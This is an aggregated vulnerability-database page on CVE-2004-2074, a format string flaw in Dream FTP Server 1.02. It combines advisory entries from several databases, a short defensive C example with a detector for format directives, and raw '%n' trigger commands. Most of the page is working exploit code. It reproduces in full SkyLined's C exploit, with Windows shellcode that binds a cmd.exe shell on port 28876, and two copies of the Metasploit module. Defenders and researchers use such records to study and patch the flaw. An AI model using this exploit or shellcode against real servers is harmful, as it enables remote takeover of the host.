CVE-2004-2074
CVSS 5.0
Published: 2004-12-31 00:00:00
Revised: 2008-09-05 16:43:07

[Original] Format string vulnerability in Dream FTP 1.02 allows local users to cause a denial of service (crash) via format string specifiers in the (1) PASS or (2) RETR commands.


[CNNVD] Dream FTP format string vulnerability (CNNVD-200412-1193)

        Dream FTP 1.02 contains a format string vulnerability. Local users can cause a denial of service (crash) via format string specifiers in the (1) PASS or (2) RETR commands.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2074
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2074
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-1193
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/15380
(UNKNOWN)  XF  dreamftp-command-format-string(15380)
http://www.securityfocus.com/bid/9800
(UNKNOWN)  BID  9800
http://securitytracker.com/id?1009295
(UNKNOWN)  SECTRACK  1009295

- Vulnerability information

Dream FTP format string vulnerability
Medium severity  Format string
2004-12-31 00:00:00 2005-10-20 00:00:00
Remote
        Dream FTP 1.02 contains a format string vulnerability. Local users can cause a denial of service (crash) via format string specifiers in the (1) PASS or (2) RETR commands.

- Advisories and patches


- Vulnerability information (823)

Dream FTP 1.2 Remote Format String Exploit (EDBID:823)
windows remote
2004-02-11 Verified
21 SkyLined
#include <stdio.h>
#include <stdlib.h>     // exit, atoi
#include <string.h>     // strstr
#include <unistd.h>     // close
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>  // inet_addr

// WIN NT/2K/XP cmd.exe shellcode
// kernel32.dll baseaddress calculation: OS/SP-independent
// string-save: 00, 0a and 0d free.
// portbinding: port 28876
// looping: reconnect after disconnect
char* shellcode = 
  "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
  "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
  "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
  "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
  "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
  "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
  "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
  "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
  "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
  "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
  "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
  "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
  "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60"
  "\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89"
  "\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56"
  "\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53"
  "\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53"
  "\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf"
  "\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf"
  "\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff"
  "\x83\xc4\x5c\x61\xeb\x89";

int main(int argc, char *argv[], char *envp[]) {
  int sock;
  FILE* FILEsock;
  struct sockaddr_in addr;
  int port = 21;
  char buffer[1024];

  if (argc<2 || argc>3) {
    printf("Usage: %s IP [PORT]\n", argv[0]);
    exit(-1);
  }
  if (argc == 3) port = atoi(argv[2]);

  printf("- Nightmare --------------------------------------------------\n"
         "  Dream FTP v1.2 formatstring exploit.\n"
         "  Written by SkyLined <SkyLined@EduP.TUDelft.nl>.\n"
         "  Credits for the vulnerability go to badpack3t\n"
         "                           <badpack3t@security-protocols.com>.\n"
         "  Shellcode based on work by H D Moore (www.metasploit.com).\n"
         "  Greets to everyone at 0dd and #netric.\n"
         "  (K)(L)(F) for Suzan.\n"
         "\n"
         "  Binds a shell at %s:28876 if successfull.\n"
         "  Tested with: WIN2KEN/Dream FTP v1.2 (1.02/TryFTP 1.0.0.1)\n"
         "--------------------------------------------------------------\n",
         argv[1]);

  addr.sin_family = AF_INET;
  addr.sin_port = htons(port);
  addr.sin_addr.s_addr = inet_addr(argv[1]);

  if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1 ||
      connect(sock, (struct sockaddr *)&addr, sizeof addr) == -1 ||
      (FILEsock = fdopen(sock, "r+")) == NULL) {
    fprintf(stderr, "\n[-] Connection to %s:%d failed: ", argv[1], port);
    perror(NULL);
    exit(-1);
  }

  printf("\n[+] Connected to %s:%d.\n", argv[1], port);
  do printf("  --> %s", fgets(buffer, sizeof buffer, FILEsock));
    while (strstr(buffer, "220-") == buffer);

  printf("\n[+] Sending exploit string...\n");
  fprintf(FILEsock,
    // Argument 10 points to the SEH handler code, it's RWE so we'll change
    // the SEH handler to redirect execution to the beginning of our
    // formatstring. When the SEH handler is called [ebx+0x3c] points
    // to the start of our formatstring, we just have to jump over the
    // formatstring exploit itself to our shellcode:
    "\xeb\x29" // Jump over the formatstring exploit
    "%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%%dd%%n"     // Argument 10 -> SEH
    "%%n" // Causes exception after SEH adjustment.
    "@@@@@@@@" // nopslide landing zone for jump
    "%s\r\n", // shellcode
    0x3C63FF-0x4f, // New SEH code = 0x3C63FF (jmp *0x3c(%ebx) | jmp [EBX+0x3C])
    shellcode);
  fflush(FILEsock); 
  close(sock);
  printf("\n[+] Done, allow a few seconds on a slow target before you can\n"
           "    connect to %s:28876.\n", argv[1]);
  return 0;
}

// milw0rm.com [2004-02-11]

- Vulnerability information (16712)

BolinTech Dream FTP Server 1.02 Format String (EDBID:16712)
windows remote
2010-06-22 Verified
21 metasploit
##
# $Id: dreamftp_format.rb 9583 2010-06-22 19:11:05Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'BolinTech Dream FTP Server 1.02 Format String',
			'Description'	=> %q{
					This module exploits a format string overflow in the BolinTech
				Dream FTP Server version 1.02. Based on the exploit by SkyLined.
			},
			'Author' 		=> [ 'Patrick Webster <patrick[at]aushack.com>' ],
			'Arch'		=> [ ARCH_X86 ],
			'License'        	=> MSF_LICENSE,
			'Version'        	=> '$Revision: 9583 $',
			'References'     =>
				[
					[ 'CVE', '2004-2074'],
					[ 'OSVDB', '4986'],
					[ 'BID', '9800'],
					[ 'URL', 'http://www.milw0rm.com/exploits/823'],
				],
			'Platform' 	=> ['win'],
			'Privileged'	=> false,
			'Payload'		=>
				{
					'Space'			=> 1000,
					'BadChars'		=> "\x00\x0a\x0d",
					'StackAdjustment'	=> -3500,
				},
			'Targets' 		=>
			[
				# Patrick - Tested OK 2007/09/10 against w2ksp0, w2ksp4 en.
				[
					'Dream FTP Server v1.02 Universal',
					{
						'Offset'			=> 3957680, # 0x3c63ff-0x4f
					}
				],
			],
			'DisclosureDate' => 'Mar 03 2004',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(21),
			], self.class)
	end

	def check
		connect
		banner = sock.get(-1,3)
		disconnect
		if (banner =~ /Dream FTP Server/)
			return Exploit::CheckCode::Appears
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect
		select(nil,nil,nil,0.25)
		sploit = "\xeb\x29"
		sploit << "%8x%8x%8x%8x%8x%8x%8x%8x%" + target['Offset'].to_s + "d%n%n"
		sploit << "@@@@@@@@" + payload.encoded
		sock.put(sploit + "\r\n")
		select(nil,nil,nil,0.25)
		handler
		disconnect
	end

end

- Vulnerability information (F83174)

BolinTech Dream FTP Server 1.02 Format String (PacketStormID:F83174)
2009-11-27 00:00:00
Patrick Webster  metasploit.com
exploit,overflow
CVE-2004-2074

This Metasploit module exploits a format string overflow in the BolinTech Dream FTP Server version 1.02. Based on the exploit by SkyLined.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ 
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'		=> 'BolinTech Dream FTP Server 1.02 Format String',
			'Description'	=> %q{
				This module exploits a format string overflow in the BolinTech
				Dream FTP Server version 1.02. Based on the exploit by SkyLined.
			},
			'Author' 		=> [ 'Patrick Webster <patrick[at]aushack.com>' ],
			'Arch'		=> [ ARCH_X86 ],
			'License'        	=> MSF_LICENSE,
			'Version'        	=> '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-2074'],
					[ 'OSVDB', '4986'],
					[ 'BID', '9800'],
					[ 'URL', 'http://www.milw0rm.com/exploits/823'],
				],
			'Platform' 	=> ['win'],
			'Privileged'	=> false,
			'Payload'		=>
				{
					'Space'			=> 1000,
					'BadChars'		=> "\x00\x0a\x0d",
					'StackAdjustment'	=> -3500,
				},
			'Targets' 		=>
			[
			# Patrick - Tested OK 2007/09/10 against w2ksp0, w2ksp4 en.
				[
					'Dream FTP Server v1.02 Universal',
					{
						'Offset'			=> 3957680, # 0x3c63ff-0x4f
					}
				],
			],
			'DisclosureDate' => 'Mar 03 2004',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(21),
			], self.class)
	end

	def check
		connect
		banner = sock.get(-1,3)
		disconnect
		if (banner =~ /Dream FTP Server/)
			return Exploit::CheckCode::Appears
		end
		return Exploit::CheckCode::Safe
	end
	
	def exploit
		connect
		sleep(0.25)
		sploit = "\xeb\x29"
		sploit << "%8x%8x%8x%8x%8x%8x%8x%8x%" + target['Offset'].to_s + "d%n%n"
		sploit << "@@@@@@@@" + payload.encoded
		sock.put(sploit + "\r\n")
		sleep(0.25)
		handler
		disconnect
	end

end

- Vulnerability information

34373
Dream FTP Multiple Command Format String DoS
Local / Remote, Context Dependent Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability

- Vulnerability description

Unknown or Incomplete

- Timeline

2004-03-03 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

BolinTech Dream FTP Server FTP Command Format String Vulnerability
Input Validation Error 9800
Yes No
2004-03-03 12:00:00 2008-01-30 09:47:00
Discovery of this vulnerability has been credited to "intuit" <intuit@linuxmail.org>.

- Affected program versions

BolinTech Dream FTP Server 1.02

- Vulnerability discussion

Dream FTP Server is prone to a remote format-string vulnerability when processing a malicious request from a client.

Exploiting this issue could allow an attacker to crash the server and possibly to execute arbitrary code on the system hosting the server. This would occur in the security context of the server process.

- Exploit

The following examples have been supplied:

user %n
pass %n
retr %n
...
and just "%n" in command line.
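As an added, defender-side example (not code from this page, from Dream FTP or from the Metasploit module): the reconstructed C pattern behind this class of bug beside its fixed form, a scanner that flags FTP command lines carrying printf directives, and a pass over a constructed session capture. The session lines, the log_line buffer and all function names are assumptions made for the illustration.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Reconstructed vulnerable pattern (not Dream FTP's source): the client's
 * command line is used as the format string, e.g. printf(line), so "%n" in
 * a PASS or RETR argument is interpreted. The fix below keeps the line as
 * an argument only; it writes to log_line and returns snprintf's length. */
char log_line[256];
int log_command_safe(const char *line) {
    return snprintf(log_line, sizeof log_line, "ftp cmd: %s", line);
}
/* Returns 1 if line holds a printf directive: '%', optional flags, width,
 * precision and length modifier, then a conversion letter. "%%" and a
 * trailing bare '%' are literal and are not flagged. */
int has_format_directive(const char *line) {
    const char *p = line;
    while ((p = strchr(p, '%')) != NULL) {
        p++;
        if (*p == '%') { p++; continue; }              /* escaped percent */
        while (*p && strchr("-+ #0", *p)) p++;          /* flags */
        while (*p && (isdigit((unsigned char)*p) || *p == '.' || *p == '*'))
            p++;                                        /* width/precision */
        while (*p && strchr("hlLqjzt", *p)) p++;        /* length modifier */
        if (*p && strchr("diouxXeEfFgGaAcspn", *p)) return 1;
    }
    return 0;
}
/* Counts client lines (prefixed "> ") in a session capture that carry a
 * format directive; server lines ("< ") are ignored. */
int count_suspicious_client_lines(const char *capture) {
    int hits = 0;
    while (*capture) {
        size_t len = strcspn(capture, "\n"), n = len;
        char line[256];
        if (n > sizeof line - 1) n = sizeof line - 1;
        memcpy(line, capture, n);
        line[n] = '\0';
        if (line[0] == '>' && has_format_directive(line)) hits++;
        capture += len + (capture[len] == '\n');
    }
    return hits;
}
/* Constructed sample capture: the PASS and RETR lines mirror the vectors
 * named in the advisory and the "%8x...%<n>d%n%n" layout of the exploit. */
const char sample_session[] =
    "< 220 Dream FTP Server ready\r\n> USER anonymous\r\n"
    "> PASS %n%n%n%n\r\n> RETR %8x%8x%8x%8x%3957680d%n%n\r\n"
    "> RETR bonus 50%\r\n> QUIT\r\n";
```

Running count_suspicious_client_lines over sample_session flags exactly the PASS and RETR lines (2), while the trailing "50%" filename is left alone.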

The following exploit code is available as a module from the Metasploit Framework:

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- References
